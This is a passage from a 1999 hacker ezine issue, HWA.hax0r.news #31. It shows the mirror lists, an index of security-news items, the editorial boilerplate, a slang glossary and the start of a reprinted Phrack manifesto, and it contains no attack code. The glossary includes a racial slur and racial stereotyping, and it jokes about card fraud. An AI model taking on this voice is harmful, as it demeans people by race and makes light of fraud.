Copy Link
Add to Bookmark
Report

hwa-hn31

eZine's profile picture
Published in 
HWA
 · 26 Apr 2019

  

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 31 Volume 1 1999 Aug 29th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Well http://welcome.to/HWA.hax0r.news/ is still down and out of reach, I
have an email in to the admins of the V3 redirector site to see if I can't
get access back to my redirector but i'm not hopeful. Meanwhile you can
get us at www.csoft.net/~hwa


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=


This week features an article by Dragos Ruiu entitleed
"Stealth Coordinated Attack HOWTO" and is a very well
written piece that sysadmins and hackers alike will find
very informative, its a must-read (section #42) - Ed



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=



New mirror sites

http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/

* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...



HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=



SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #31

=-----------------------------------------------------------------------=



We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #31

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. DOJ contemplates secret searches.................................
04.0 .. First net convict will do no time................................
05.0 .. NORTON ANTIVIRUS 2000 IS OUT.....................................
06.0 .. SSL CPU CONSUMPTION CAUSES CONCERNS..............................
07.0 .. Bug in Bill Gate's Anus?.........................................
08.0 .. CESA Causing Outrage In Libertarians ............................
09.0 .. ReDaTtAcK Arrested, Questioned, Charged, Released................
10.0 .. Some GPS Systems Fail With Date Rollover ........................
11.0 .. Security Search Engine MindSec Goes Online ......................
12.0 .. CIA Ex-Director Security Clearance Revoked ......................
13.0 .. GAO Releases Report on Risk Assement ............................
14.0 .. CESA Drives People to Freedom ...................................
15.0 .. Who's doing the Scanning? .......................................
16.0 .. Japanese police go after copyright infringers....................
17.0 .. Anti-Gay Web domain Returned to Original Owner ..................
18.0 .. EXPLOIT-DEV Mailing List Started ................................
19.0 .. NetBus - Product Under Siege ....................................
20.0 .. Worst Security Hole Ever? .......................................
21.0 .. IRC Banned in Malaysia ..........................................
22.0 .. I want my, I want my, I want my HNN - more goodies from HNN......
23.0 .. Melissa Creator Admits Guilt ....................................
24.0 .. cDc Responds to Allegations About HKBs ..........................
25.0 .. $50G Offered in 'Hacker Challenge' Publicity Stunt ..............
26.0 .. NSA Recruiting In the Underground ...............................
27.0 .. Distributed.net Fingers Thief ...................................
28.0 .. Hacktivism Email List ...........................................
29.0 .. Mitnick in Car Accident .........................................
30.0 .. Hong Kong Police Create Computer Crime Squad ....................
31.0 .. Outlook Holes Demonstrated at USENIX ............................
32.0 .. Feds Overflowing with Siezed Equipment ..........................
33.0 .. Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions
34.0 .. Triads Linked to Info Vandalism - Alleged CoverUp by RCMP .......
35.0 .. DoD Preps to Fight InfoCriminals Both Foreign and Domestic ......
36.0 .. Another Big Hole Found in NT ....................................
37.0 .. Korea to Block All Porn .........................................
38.0 .. Grammatically Challenged InfoCriminal Defaces Site ..............
39.0 .. Bank Emails Virus to Investors ..................................
40.0 .. IS YAHOO SPAM OR ANTI-SPAM ORIENTED?.............................
41.0 .. "NINES PROBLEM"..................................................
42.0 .. Stealth Coordinated Attack HOWTO by Dragos Ruiu..................
43.0 .. TAIWAN CIRCLES WAGONS IN CYBER-WARFARE...........................
44.0 .. UK WEBHOSTING COMPANY HIT BY VIRUS...............................
45.0 .. NETSCAPE ISSUES WEB-SERVER FIX...................................
46.0 .. CWI CRACKS 512 BIT KEY...........................................
47.0 .. MOUNTING AN ANTI-VIRUS DEFENSE...................................
48.0 .. RETROSPECTIVE ON CRACKING CONTESTS...............................
49.0 .. SHOUTCAST COMPROMISED............................................
50.0 .. AUDIT OFFICE BLASTS AGENCIES' SERIOUS SECURITY FLAWS.............
51.0 .. ISS X-FORCE ADVISORY ON LOTUS NOTES DOMINO SERVER 4.6............
52.0 .. TECHNOLOGY KEY TO TRACKING DOWN INTERNET CRIME...................
53.0 .. GOVT HOME-INVASION BILL DRIVES US PC USERS TO CANADA.............
54.0 .. HACKERS SCANNING FOR TROUBLE.....................................
55.0 .. Canada Net they've built a super fast network, but what to do with it?
56.0 .. Security focus BUGTRAQ summary...................................
57.0 .. A typical script kiddie attack scenerio against HTTP server......
58.0 .. NMAP - Scan Analysis (v2)........................................
59.0 .. Security Focus: Incidents Summary................................
60.0 .. Security Focus: Jobs.............................................
=--------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.


Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*


If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org



+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack

http://www.ottawacitizen.com/business/

http://search.yahoo.com.sg/search/news_sg?p=hack

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack

http://www.zdnet.com/zdtv/cybercrime/

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/ Electronic Underground Affiliation

http://ech0.cjb.net ech0 Security

http://axon.jccc.net/hir/ Hackers Information Report

http://net-security.org Net Security

http://www.403-security.org Daily news and security related site


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

<a href="
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "
noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"
CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)



Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "
Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "
subscribe isn".



@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media



Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland


Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "
new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "
is not equal to" or "does not equal"
ASC(247) "
wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "
script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "
Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "
Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "
you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "
telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "
w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix


Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

& Kevin Mitnick (Happy Birthday)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"
What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99



+++ When was the last time you backed up your important data?

++ DEFAULT #3 RELEASED

The cool DEFAULT newsletter by Help net-security.org is up to issue#3 check it out

by BHZ, Friday 27th August 1999 on 3:01 pm CET
Third issue of our newsletter is out. You can read abot following topics: Y2K week in
review + Outlook Express Year 2000 Update, Look into basic cryptography, Freedom
Network, IP Masquerading, Macintosh security, Trojan forensics, Scams - Getting
something by all means, Freedom of the speech review and part two of excellent
Intrusion and detection article. Download > default3.txt or default3.zip.

http://default.net-security.org/dl/default3.txt
http://default.net-security.org/dl/default3.zip




Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue,)

Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...

Since theres nothing to print here, here's the Mentor's last words direct from Phrack7
file 003 complete and unabridged... send in your mail/questions etc! - Ed

==Phrack Inc.==

Volume One, Issue 7, Phile #3 of 10

The following was written shortly after my arrest. I am currently
groupless, having resigned from the Racketeers, so ignore the signoff...

The Conscience of a Hacker... by The Mentor... 1/8/86
Another one got caught today, it's all over the papers. "
Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker? Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain
for the fifteenth time how to reduce a fraction. I understand it. "
No, Ms.
Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"
This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless. We've been dominated by sadists, or
ignored by the apathetic. The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.
